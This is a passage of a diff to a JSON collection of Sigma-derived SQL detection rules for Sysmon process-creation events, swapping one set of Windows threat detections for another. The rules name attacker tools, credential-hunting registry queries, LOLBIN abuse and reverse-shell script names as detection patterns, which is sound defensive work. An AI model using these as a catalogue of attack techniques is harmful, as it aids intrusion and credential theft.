"6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.collection", + "attack.t1560.001" + ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "Potential Suspicious Registry File Imported Via Reg.EXE", - "id": "62e0298b-e994-4189-bc87-bc699aa62d97", - "status": "experimental", - "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "status": "test", + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Legitimate import of keys" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_dridex.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "Potential Password Spraying Attempt Using Dsacls.EXE", - "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", "status": "experimental", - "description": "Detects possible password spraying attempts using Dsacls", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", + "author": "Sreeman", "tags": [ + "attack.t1204", + "attack.t1566.001", "attack.execution", - "attack.t1218" + "attack.initial_access" ], "falsepositives": [ - "Legitimate use of dsacls to bind to an LDAP session" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_password_spray.yml" + "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" }, { - "title": "Explorer Process Tree Break", - "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "title": "HH.EXE Execution", + "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "status": "test", - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", + "description": "Detects the usage of \"hh.exe\" to execute \".chm\" files.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.001" ], "falsepositives": [ - "Unknown" + "False positives are expected with legitimate \".CHM\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%.chm%' ESCAPE '\\')" ], - "filename": "proc_creation_win_explorer_break_process_tree.yml" + "filename": "proc_creation_win_hh_chm_execution.yml" }, { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", - "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Enumeration for Credentials in Registry", + "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "status": "test", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Suspicious Electron Application Child Processes", - "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", - "status": "experimental", - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Visual Studio NodejsTools PressAnyKey Renamed Execution", + "id": "65c3ca2c-525f-4ced-968e-246a713d164f", + "status": "test", + "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\discord.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'Microsoft.NodejsTools.PressAnyKey.exe' AND NOT ((Image LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_electron_app_children.yml" + "filename": "proc_creation_win_renamed_pressanykey.yml" }, { - "title": "New Root Certificate Installed Via Certutil.EXE", - "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", - "status": "test", - "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "status": "experimental", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": 